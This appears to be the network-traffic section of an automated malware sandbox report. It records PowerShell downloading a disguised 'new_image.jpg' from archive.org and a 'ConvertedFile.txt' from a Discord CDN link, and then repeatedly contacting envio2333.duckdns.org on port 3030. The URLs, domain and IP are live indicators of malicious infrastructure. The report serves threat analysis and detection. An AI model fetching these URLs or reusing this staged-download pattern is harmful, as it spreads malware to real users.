                                                                                  Apr 26, 2025 02:54:22.937433958 CEST4971480192.168.2.4199.232.214.172
                                                                                  Apr 26, 2025 02:54:23.085305929 CEST8049712172.217.12.131192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.085377932 CEST4971280192.168.2.4172.217.12.131
                                                                                  Apr 26, 2025 02:54:23.086049080 CEST8049714199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.086060047 CEST8049714199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.086200953 CEST4971480192.168.2.4199.232.214.172
                                                                                  Apr 26, 2025 02:54:23.088323116 CEST8049711199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.088335037 CEST8049711199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.088381052 CEST4971180192.168.2.4199.232.214.172
                                                                                  Apr 26, 2025 02:54:24.108830929 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:28.124353886 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:36.124376059 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:47.156845093 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:48.171257973 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:50.171291113 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:54.171346903 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:02.171263933 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:13.923880100 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:14.939964056 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:16.938294888 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:20.936924934 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:22.062087059 CEST49708443192.168.2.452.113.196.254
                                                                                  Apr 26, 2025 02:55:27.999140024 CEST44349713131.253.33.254192.168.2.4
                                                                                  Apr 26, 2025 02:55:28.950624943 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:30.032778978 CEST44349715204.79.197.222192.168.2.4
                                                                                  Apr 26, 2025 02:55:39.971981049 CEST497303030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:40.983834982 CEST497303030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:42.983827114 CEST497303030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:46.983829021 CEST497303030192.168.2.4146.70.50.42
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 26, 2025 02:53:45.206456900 CEST5852153192.168.2.41.1.1.1
                                                                                  Apr 26, 2025 02:53:45.346749067 CEST53585211.1.1.1192.168.2.4
                                                                                  Apr 26, 2025 02:53:46.047657013 CEST6183653192.168.2.41.1.1.1
                                                                                  Apr 26, 2025 02:53:46.219835997 CEST53618361.1.1.1192.168.2.4
                                                                                  Apr 26, 2025 02:53:49.223866940 CEST6373853192.168.2.41.1.1.1
                                                                                  Apr 26, 2025 02:53:49.364090919 CEST53637381.1.1.1192.168.2.4
                                                                                  Apr 26, 2025 02:53:54.740283966 CEST6550053192.168.2.41.1.1.1
                                                                                  Apr 26, 2025 02:53:54.968466997 CEST53655001.1.1.1192.168.2.4
                                                                                  Apr 26, 2025 02:55:13.187845945 CEST5728753192.168.2.41.1.1.1
                                                                                  Apr 26, 2025 02:55:13.922892094 CEST53572871.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Apr 26, 2025 02:53:45.206456900 CEST192.168.2.41.1.1.10x52cbStandard query (0)archive.orgA (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:46.047657013 CEST192.168.2.41.1.1.10x27f1Standard query (0)ia801700.us.archive.orgA (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:49.223866940 CEST192.168.2.41.1.1.10x3259Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:54.740283966 CEST192.168.2.41.1.1.10x79b8Standard query (0)envio2333.duckdns.orgA (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:55:13.187845945 CEST192.168.2.41.1.1.10x5868Standard query (0)envio2333.duckdns.orgA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Apr 26, 2025 02:53:45.346749067 CEST1.1.1.1192.168.2.40x52cbNo error (0)archive.org207.241.224.2A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:46.219835997 CEST1.1.1.1192.168.2.40x27f1No error (0)ia801700.us.archive.org207.241.233.30A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:49.364090919 CEST1.1.1.1192.168.2.40x3259No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:49.364090919 CEST1.1.1.1192.168.2.40x3259No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:49.364090919 CEST1.1.1.1192.168.2.40x3259No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:49.364090919 CEST1.1.1.1192.168.2.40x3259No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:49.364090919 CEST1.1.1.1192.168.2.40x3259No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:53:54.968466997 CEST1.1.1.1192.168.2.40x79b8No error (0)envio2333.duckdns.org146.70.50.42A (IP address)IN (0x0001)false
                                                                                  Apr 26, 2025 02:55:13.922892094 CEST1.1.1.1192.168.2.40x5868No error (0)envio2333.duckdns.org146.70.50.42A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • archive.org
                                                                                  • ia801700.us.archive.org
                                                                                  • cdn.discordapp.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449719207.241.224.24437776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-04-26 00:53:45 UTC127OUTGET /download/new_image_20250413/new_image.jpg HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0
                                                                                  Host: archive.org
                                                                                  Connection: Keep-Alive
                                                                                  2025-04-26 00:53:46 UTC1947INHTTP/1.1 302 Found
                                                                                  Server: nginx/1.24.0
                                                                                  Date: Sat, 26 Apr 2025 00:53:45 GMT
                                                                                  Content-Type: image/jpeg
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Accept-Ranges: bytes
                                                                                  Location: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
                                                                                  Strict-Transport-Security: max-age=15724800
                                                                                  Onion-Location: https://archivep75mbjunhxc6x4j5mwjmomyxb573v42baldlqu56ruil2oiad.onion/download/new_image_20250413/new_image.jpg
                                                                                  Content-Security-Policy: report-uri https://archive.org/services/csp-report; default-src *; img-src * data: blob:; object-src 'none'; media-src * blob:; connect-src * data:; style-src 'unsafe-inline' https://archive.org/ https://archive.org https://esm.archive.org/ https://esm.ext.archive.org/ https://offshoot.prod.archive.org/ https://av.archive.org/css/ https://av.dev.archive.org/css/ https://accounts.google.com/gsi/ https://synerg.adp.com/; script-src 'nonce-19dfdbb78c85f8513415977e156e82bd' https://archive.org/includes/ https://archive.org/includes/ https://archive.org/components/ https://archive.org/components/ https://archive.org/v/ https://archive.org/v/ https://archive.org/upload/app/ https://archive.org/offshoot_assets/ https://archive.org/offshoot_assets/ https://esm.archive.org/ https://esm.ext.archive.org/ https://polyfill.archive.org/v3/polyfill.min.js https://offshoot.prod.archive.org/ https://av.archive.org/ https://av.dev.archive.org/ https://openlibrary.org/query.json https://emularity-engine [TRUNCATED]
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  2025-04-26 00:53:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449720207.241.233.304437776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-04-26 00:53:46 UTC138OUTGET /6/items/new_image_20250413/new_image.jpg HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0
                                                                                  Host: ia801700.us.archive.org
                                                                                  Connection: Keep-Alive
                                                                                  2025-04-26 00:53:47 UTC582INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.24.0
                                                                                  Date: Sat, 26 Apr 2025 00:53:46 GMT
                                                                                  Content-Type: image/jpeg
                                                                                  Content-Length: 3172652
                                                                                  Last-Modified: Sun, 13 Apr 2025 17:38:51 GMT
                                                                                  Connection: close
                                                                                  ETag: "67fbf6ab-30692c"
                                                                                  Strict-Transport-Security: max-age=15724800
                                                                                  Expires: Sat, 26 Apr 2025 06:53:46 GMT
                                                                                  Cache-Control: max-age=21600
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                  Access-Control-Allow-Credentials: true
                                                                                  Accept-Ranges: bytes
                                                                                  2025-04-26 00:53:47 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 07 08 ff c4 00 47 10 00 02 02 01 03 02 05 02 04 05 03 04 01 01 02 0f 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 32 71 14 81 91 a1 06 23 42 b1 c1 52
                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222p"G!1A"Qa2q#BR
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: 19 25 ba 75 52 e4 39 e3 12 40 04 ac 07 4c 8b c3 71 85 c7 17 82 26 4c 18 fb 7d 17 8a 2e 0c 38 32 43 87 b9 e7 22 8b e4 0c 94 32 09 b4 93 40 64 2a 47 5c 68 da 9f 93 43 df 0c 8c 09 a0 70 39 d6 ab c7 0e 57 13 27 5c 42 1e 49 39 3b 64 e9 93 f2 c9 27 18 7b 56 0e d8 72 49 58 32 1c 87 a6 49 30 de 0c 35 92 0c 9d f1 95 4b 5d 60 ae 72 49 b7 05 0b cb 01 1c e2 1e 09 c9 06 42 30 8c 99 20 ba ed 78 0e 36 0e 9d 72 42 70 63 05 e2 fb 60 ac 90 0c 1c 9b c6 ba c0 39 c9 06 5d 0c 5e 60 3f 02 f2 ac b2 29 5a 2b 23 9b 19 22 95 da 4d f1 8a 79 c7 77 2f 89 8a 42 6b a6 4c 99 3a e0 93 06 4c 99 11 dc 47 4c 85 89 c1 57 90 82 0d 1c 92 64 c9 f9 64 c1 26 4e f8 70 64 92 b2 64 c9 d3 24 95 93 27 7c 9d 32 48 70 61 ed 83 24 9d b0 82 6a b0 64 c9 26 1c 19 32 42 38 c8 72 58 c1 92 1b e3 06 4c 98 a3 c2
                                                                                  Data Ascii: %uR9@Lq&L}.82C"2@d*G\hCp9W'\BI9;d'{VrIX2I05K]`rIB0 x6rBpc`9]^`?)Z+#"Myw/BkL:LGLWdd&Npdd$'|2Hpa$jd&2B8rXL
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: cb 59 a9 65 8a 2d b1 c5 65 58 8d f6 3a ff 00 ce 71 e5 9c c8 3f 0e 8c 3c 95 62 54 10 07 ef f9 67 59 26 39 5e 57 58 ca 12 69 af 81 db 14 8d a0 d7 7e 0f ce 3c a5 96 4a 5a e9 d4 73 8c bc d9 20 f4 e3 8c ce 1d 52 0e db 52 01 1f db 13 69 be 96 32 e7 49 05 2b 72 07 4a 18 a2 f6 ed 3f 96 66 b5 01 08 fa 4f 23 1c a4 88 b6 0d 0e 98 d1 43 52 28 3c df 6c ea 3e 92 1d 34 90 4d 3d 18 98 fa 90 1e 7a 63 26 b3 79 48 e2 1d c4 d1 c7 40 15 49 23 b6 33 6c bb e6 ba f3 8a aa 4d 91 c6 67 1a 94 b4 7b 91 c6 32 33 a3 6e 8c 90 df 18 c6 34 08 ac 58 f3 76 3d b1 55 4b 48 06 e0 aa 7b b1 a1 96 55 ed 7c 24 79 ea 67 53 b4 f2 40 f6 c6 7f 2a 68 8e c4 08 db ac 5f 61 99 86 e7 60 a0 8b aa eb 8c db 95 42 d1 04 73 9b ff 00 ac e1 76 38 6e c6 81 34 32 05 46 07 76 ef 8a c0 19 87 51 c9 ef 96 aa b3 30 fe
                                                                                  Data Ascii: Ye-eX:q?<bTgY&9^WXi~<JZs RRi2I+rJ?fO#CR(<l>4M=zc&yH@I#3lMg{23n4Xv=UKH{U|$ygS@*h_a`Bsv8n42FvQ0
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: 21 ab 21 37 db 06 58 ab 63 24 30 ca 62 56 1e e2 b2 a2 6f 9c 66 15 82 b1 4d 09 14 4d 16 e6 6a 39 51 55 0e 42 9b 18 97 ec 71 95 b6 f6 cb 0d bb 30 2c 93 91 6a f1 e2 4f 32 40 2e b1 18 6d 62 06 4c a3 7d f1 70 e0 c8 8f 6c 23 06 41 90 12 6b 18 72 79 e7 17 27 4c 74 0d 8c 1d 72 75 e7 25 64 93 26 1f cf 21 eb c6 49 06 4c 9d 39 c9 92 4c 35 47 e7 25 e4 38 c0 9d f1 e3 20 48 a7 14 fb e2 f7 c5 35 6a 18 b5 55 1f b6 66 00 a9 ef 7f 7c b1 14 b1 17 92 64 d8 46 17 14 d8 ab a9 e9 c6 4e d8 45 64 cb 0a 60 3f 38 7a e0 ef 90 11 cf 19 3b e4 ae 32 64 92 b2 5f 19 2c e1 19 20 bb c3 47 8c 70 83 6d d6 25 f1 88 10 48 e4 e3 a4 a5 14 81 d4 e2 28 2c 40 cb 67 8b c9 70 3e d8 a5 40 1b bf 7c 20 1e 07 7c 19 2e 87 ce 49 6c 8a 05 51 ed 95 9e 30 86 e3 21 62 d4 2b a7 b6 20 3b 64 ed 87 69 14 18 10 72
                                                                                  Data Ascii: !!7Xc$0bVofMMj9QUBq0,jO2@.mbL}pl#Akry'Ltru%d&!IL9L5G%8 H5jUf|dFNEd`?8z;2d_, Gpm%H(,@gp>@| |.IlQ0!b+ ;dir
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: a3 e4 75 fd 33 4f 88 fe 0b f0 89 16 97 4f 22 ea 5e 81 2f 60 0a ae 97 d7 be 73 f5 09 24 30 95 92 48 99 88 b0 51 c1 af d3 2e 56 55 2f 4c 73 6c 77 d8 ab b8 b7 4a f7 ce 9f 85 49 bb 50 35 05 36 c6 1c 03 5e ff 00 f0 65 9f c3 85 a0 f1 15 0f a7 f3 a3 90 ec b2 bd 0f 1c 8f d3 3a 32 7f 0e eb 5f f8 80 c6 b5 1c 12 10 6f b5 70 0f e7 99 37 97 d3 7e b8 2e af 4c 59 64 8c ee 5a 16 dc 74 cf 13 a9 85 52 77 88 b2 d8 3c b0 3c 67 a1 f1 9d 34 de 19 ac 5d 2e 9d ac ed 26 89 f8 1f ef 9e 6a 61 21 67 66 07 71 3e a2 47 43 92 e0 dc 1b f0 da 60 bc 39 65 0d 60 f4 cc ae 47 9a 4a 8d a7 1a 06 09 a7 76 71 b8 8e 79 35 f9 62 b4 fe 6c e5 be 9a f8 c7 1a d6 bd 31 1a 8d 25 3b 90 14 dd 0e dd 70 6a 34 c7 d1 3f 0d 1b 82 00 5e 4f 1c 65 11 c9 22 bc 66 22 37 21 e1 7f 3b fc f0 c9 34 ab c9 62 af 64 d5 7b
                                                                                  Data Ascii: u3OO"^/`s$0HQ.VU/LslwJIP56^e:2_op7~.LYdZtRw<<g4].&ja!gfq>GC`9e`GJvqy5bl1%;pj4?^Oe"f"7!;4bd{
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: 2c 9c b3 e8 b1 c0 1e d8 0c 9b 78 5f d7 0c 51 1a 3a e3 ea 23 be 56 cb c6 58 8c 45 1e a2 f9 c8 63 b2 48 bc 2c fc 3b fa a8 5d f0 39 c8 88 59 b8 c6 e2 ea b9 cb 13 ad 74 1d ce 1f 7d 9b 4a b1 10 6d 88 e3 24 86 db 91 c0 f7 c0 cf b8 f1 c6 56 4f 27 be 6a d9 3a 82 4b 7d 99 69 9b 8e 06 42 5b d4 41 a1 88 18 8e 9d 71 c3 03 f5 74 cc eb 58 0a 0b 37 06 eb 25 57 42 0e 0d fc 52 8a f9 c5 27 9e 72 e9 76 b0 b0 20 12 2c e1 43 68 dd 6c f6 ca cf d5 ef 80 93 78 69 c3 10 54 ee 1f b6 42 ef 23 70 3b 76 c3 e6 1a a2 01 c9 e6 11 f4 8a f7 ca e2 20 e1 a8 f0 71 88 07 9e 01 c1 bb a5 e4 1c f2 3a e5 12 74 3d 3a e5 91 9d cc 17 df a7 c6 03 44 0f 7c 11 37 97 28 60 01 03 19 ec 7b 87 5f 44 81 c8 e8 7b 65 92 28 6b 71 cf 17 78 03 c6 c6 f7 32 92 3b 0c b7 cb 15 4a cb 47 b1 3c e7 49 3e 98 b5 8d ba f1
                                                                                  Data Ascii: ,x_Q:#VXEcH,;]9Yt}Jm$VO'j:K}iB[AqtX7%WBR'rv ,ChlxiTB#p;v q:t=:D|7(`{_D{e(kqx2;JG<I>
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: 7c 1f cc 5b b2 47 c1 c0 48 aa eb 8d aa 44 12 37 db ed 97 fe 20 82 57 68 3e e4 62 25 49 45 4f a8 65 41 7f 9a 2c 8a ef 8f 70 64 ab 26 1f 49 1d fb 0c ab 8a f9 ef 9a 25 4d e7 92 00 03 81 ef 99 ca ed 03 6f 37 d7 33 cb 74 f1 f4 ae d8 1b 5c 8e c5 88 27 b6 33 5a f1 85 45 72 73 15 bd 25 fa 45 fb e1 35 d4 13 78 d2 91 5d 31 18 10 00 c1 16 c9 c9 67 f2 c6 0b cf 38 1e ba 0c 1a 40 d4 08 a1 cf 7c 17 ef 90 29 ee 31 a8 7d f2 ca 00 72 72 cf 2c 91 e9 1c e3 44 00 1c 8f b6 16 6e 6b 37 38 f5 db 36 f6 2b b9 63 31 95 14 71 51 36 73 7f 96 1e f5 ba b2 06 da 3b 1c 64 90 76 53 12 f7 6a e7 11 a3 37 c5 91 ef 8c 5a c5 f7 c8 93 76 38 5c 33 55 00 6f e3 09 af 6b cb df 90 08 e9 95 ed 0c b6 38 c2 f1 33 91 41 24 d8 c6 1c b0 37 44 61 da 83 8b e6 b1 4a b2 9a ed db 0c b1 2c 1a 99 54 9a 72 7e 2f
                                                                                  Data Ascii: |[GHD7 Wh>b%IEOeA,pd&I%Mo73t\'3ZErs%E5x]1g8@|)1}rr,Dnk786+c1qQ6s;dvSj7Zv8\3Uok83A$7DaJ,Tr~/
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: 7c 9a 8d 40 55 e8 15 12 c2 af 00 71 64 fb 5e 11 6e fa 34 1e 1b a4 d4 f8 74 3e 56 a3 6e bb 7b 29 8d 81 22 4b 34 b5 d8 7e 67 be 27 89 7f 0e 78 bf 83 c7 1b eb f4 86 15 97 e8 3e 62 b5 fe 84 d6 51 e1 7a 77 d4 f8 84 08 93 08 88 70 43 9e c6 ec 57 ce 75 3f 88 7c 63 c4 9e 79 b4 1a 8d 74 9a a8 d1 c8 dd 23 12 54 83 d3 f6 c5 9e f7 1c 44 d3 c8 c1 49 21 54 f0 18 9c 33 33 2e 9d b4 e6 8a 96 dc 5a b9 e9 8a c1 82 8b 24 8e 9f 03 2f 81 e3 fc 39 47 40 c4 9b dc 47 38 f2 b9 1b e1 2d be dd 9f e1 5f e2 4d 1f 80 c7 a9 33 e8 d6 59 dd 6a 39 28 5a f0 78 06 b8 be 33 6f 86 ff 00 13 4f 27 89 48 f1 86 86 39 9c 6e 11 b6 d2 39 3d 48 eb d7 3c 7e a5 87 98 1a b8 3d 2b 2d d2 eb 84 24 a1 e7 77 be 73 e5 7f 1a e3 f1 f1 b6 f9 3d bf 8c 78 7c 5f c5 1f c5 10 f8 7e 8b 5a d2 22 42 0c b2 c8 49 21 fd 56
                                                                                  Data Ascii: |@Uqd^n4t>Vn{)"K4~g'x>bQzwpCWu?|cyt#TDI!T33.Z$/9G@G8-_M3Yj9(Zx3oO'H9n9=H<~=+-$ws=x|_~Z"BI!V
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: 0d 29 ee 7e 31 73 9c 31 b7 f1 1e 1c 9e 18 b1 47 09 6d 46 d2 19 8f 6b ef d3 38 c4 04 b6 24 8a f9 bb f6 ce 86 b6 28 a3 94 3c 52 06 89 97 8a 15 46 87 f9 ca 35 1e 1f 34 50 45 21 da 7c d0 48 07 9a aa ff 00 7c 94 8a f4 9a 76 d5 ca 91 86 54 26 c9 76 a3 5c 65 12 87 09 b8 d9 40 2d 4d d6 ec b6 3d 26 a6 12 b4 8c cc ca 1b 69 60 6c 1c 71 03 f9 4b e6 c8 49 53 b7 ca 26 ff 00 3f 6c 7e 8f da 26 a8 da ed 99 9d ac 53 b5 f2 7f 3c 2c c1 63 62 20 66 27 ab 5d 81 ef 81 22 26 06 58 91 48 2d c1 3d 47 db 2e 8f 57 2e 9f 4c d0 85 42 b4 6c 91 8e 8c 59 06 b6 48 f4 41 0d d0 36 51 87 51 da 8e 62 6d 4b cc 1e 44 dd 18 27 69 50 7a 8e d7 8d e6 4b 31 b4 da 69 68 2b 74 f9 ca 61 dc 64 65 91 69 4f 5a f7 c0 ce 30 d1 46 d2 1d a8 ca a4 8b 26 ba 7e 78 ae 49 1b 5a a9 8d 1e f8 c0 6c 2c 11 45 11 fa 8c
                                                                                  Data Ascii: )~1s1GmFk8$(<RF54PE!|H|vT&v\e@-M=&i`lqKIS&?l~&S<,cb f']"&XH-=G.W.LBlYHA6QQbmKD'iPzK1ih+tadeiOZ0F&~xIZl,E
                                                                                  2025-04-26 00:53:47 UTC16384INData Raw: d9 ef f1 9a 83 0a a0 33 cf 5d aa 35 d6 d3 d3 db 31 4c 4a 0e 09 02 fb 66 d7 60 54 7b e6 3d 44 aa 63 a1 41 87 c7 5c 22 8e 1e b0 31 67 94 1b 60 2e ba f1 f6 ce 53 68 63 33 7e 2b 51 22 8d 30 21 88 ef c7 c7 e4 73 d3 e9 15 1f c4 1e 27 08 cb b6 cd af c8 cb 3c 67 c3 74 f3 e8 24 86 38 91 5d 81 aa 00 51 ac f4 70 b8 f2 ff 00 93 cb 2e 3e 55 e2 57 36 ad fc b5 20 33 1d a0 2f 55 ed 95 c5 2c f7 34 a6 70 b2 e9 90 24 6a d4 2f 9a aa f8 19 af c5 0e a7 4b a9 78 a7 45 56 50 00 65 15 c0 ce 74 0b f8 89 9b 83 b4 f3 bc f2 2f 3d 9c 66 c7 cf f9 2a 9d 76 a8 6a 34 d1 c8 59 9f 54 86 9d 4a d5 8f 7f d4 e4 d3 2a 38 91 20 d3 b6 a1 d8 76 b3 b4 fb d7 39 e8 7c 0b c2 74 32 be a4 eb 1c 30 68 eb 9e 36 f2 31 1a 3d 2e 8e 4d 2e 87 c3 e5 45 d4 48 7c af c4 0e 06 d2 7a 9f 7e 6b bf 6c dc b8 f3 de 4e 37
                                                                                  Data Ascii: 3]51LJf`T{=DcA\"1g`.Shc3~+Q"0!s'<gt$8]Qp.>UW6 3/U,4p$j/KxEVPet/=f*vj4YTJ*8 v9|t20h61=.M.EH|z~klN7


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449723162.159.134.2334437776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-04-26 00:53:49 UTC230OUTGET /attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e& HTTP/1.1
                                                                                  Host: cdn.discordapp.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-04-26 00:53:50 UTC1137INHTTP/1.1 200 OK
                                                                                  Date: Sat, 26 Apr 2025 00:53:49 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 86016
                                                                                  Connection: close
                                                                                  CF-Ray: 93621afb0e6b52b3-LAX
                                                                                  CF-Cache-Status: HIT
                                                                                  Accept-Ranges: bytes, bytes
                                                                                  Age: 117941
                                                                                  Cache-Control: public, max-age=31536000
                                                                                  Content-Disposition: attachment; filename="ConvertedFile.txt"
                                                                                  ETag: "26b242aa855ca39560812621e6fc2eb8"
                                                                                  Expires: Sun, 26 Apr 2026 00:53:49 GMT
                                                                                  Last-Modified: Thu, 24 Apr 2025 15:30:58 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  x-goog-generation: 1745508658077110
                                                                                  x-goog-hash: crc32c=AKJrlg==
                                                                                  x-goog-hash: md5=JrJCqoVco5VggSYh5vwuuA==
                                                                                  x-goog-metageneration: 1
                                                                                  x-goog-storage-class: STANDARD
                                                                                  x-goog-stored-content-encoding: identity
                                                                                  x-goog-stored-content-length: 86016
                                                                                  x-guploader-uploadid: AAO2VwpglUK22Qztj_OOkcv2ZMuihSDmm6VRrNm-wNVXbYUdOfcFcwP1S3qXsn_7fIePjgc
                                                                                  Set-Cookie: __cf_bm=uyog0SBvtwoVg1cVJ4U.mDXPvZ_EdjgHOF5PeWZ6.uk-1745628829-1.0.1.1-AL4cUdIKVtdv5meN3YcD8_n_Q7OaObihPnrOhqay3eeehplhskwnsz3RLOMQM1qOlF2KJiTUX2R4GLacaxGVtqXudD.GuCmc.qI9TZ8mNRA; path=/; expires=Sat, 26-Apr-25 01:23:49 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                  2025-04-26 00:53:50 UTC587INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 46 6c 5a 4d 35 68 61 62 4e 25 32 46 36 5a 38 52 77 67 35 48 6d 61 57 76 54 66 51 69 7a 6e 35 38 62 70 76 41 4b 4a 52 56 54 43 4b 73 6f 46 38 74 45 66 79 6a 79 36 58 35 39 52 38 61 6c 35 7a 72 76 35 65 79 6d 6d 74 58 78 6e 4b 59 58 39 31 6f 33 77 35 7a 6e 71 4b 79 71 6a 76 37 6d 78 5a 4d 67 51 46 42 41 50 34 42 36 73 31 53 64 4d 65 71 57 4f 77 64 6d 70 48 32 35 34 6e 66 45 37 72 42 61 6c 35 31 35 5a 35 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FlZM5habN%2F6Z8Rwg5HmaWvTfQizn58bpvAKJRVTCKsoF8tEfyjy6X59R8al5zrv5eymmtXxnKYX91o3w5znqKyqjv7mxZMgQFBAP4B6s1SdMeqWOwdmpH254nfE7rBal515Z5w%3D%3D"}],"group":"cf-nel","max_age":60
